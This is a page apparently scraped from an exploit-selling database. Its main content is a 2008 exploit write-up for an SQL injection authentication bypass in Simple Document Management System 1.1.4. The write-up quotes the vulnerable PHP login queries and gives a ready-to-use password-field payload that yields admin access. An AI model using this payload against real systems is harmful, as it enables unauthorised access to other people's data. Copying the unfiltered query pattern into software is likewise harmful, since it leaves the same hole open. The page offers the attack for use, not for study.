0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Simple Document Management System 1.1.4 SQL Injection Auth Bypass
================================================================= Simple Document Management System 1.1.4 SQL Injection Auth Bypass ================================================================= SDMS Simple Document Management System v1.1.4 SQL Injection ___________________________________________________________________________ Author: Yuri Program: SDMS Simple Document Management System Version: v1.1.4 (and probably all older versions as well) Website: http://sdms.cafuego.net/ How it works ___________________________________________________________________________ The login system is very insecure, this is the code we are going to abuse: $result = @mysql_query("SELECT pass != PASSWORD('$pass') FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); if( $row[0] != 0 ) { header("Location: index.php"); exit; } $result = @mysql_query("SELECT id,name FROM users WHERE user='$login'"); $row = @mysql_fetch_array($result); $id = $row[id]; $name = $row[name]; If the result of the first query is 0, it selects the id and name from the user entered at the login page. There is no filter on $pass. So if we enter user: Admin (case insensitive) password: ') FROM users WHERE id=-1 UNION SELECT 0 FROM users -- The resulting query looks like this: SELECT pass != PASSWORD('') FROM users WHERE id=-1 UNION SELECT 0 FROM users --') FROM users WHERE user='$login' which is always 0, so voila, admin access. ___________________________________________________________________________ Yuri // 04 - 11 - 2008 # 0day.today [2024-07-07] #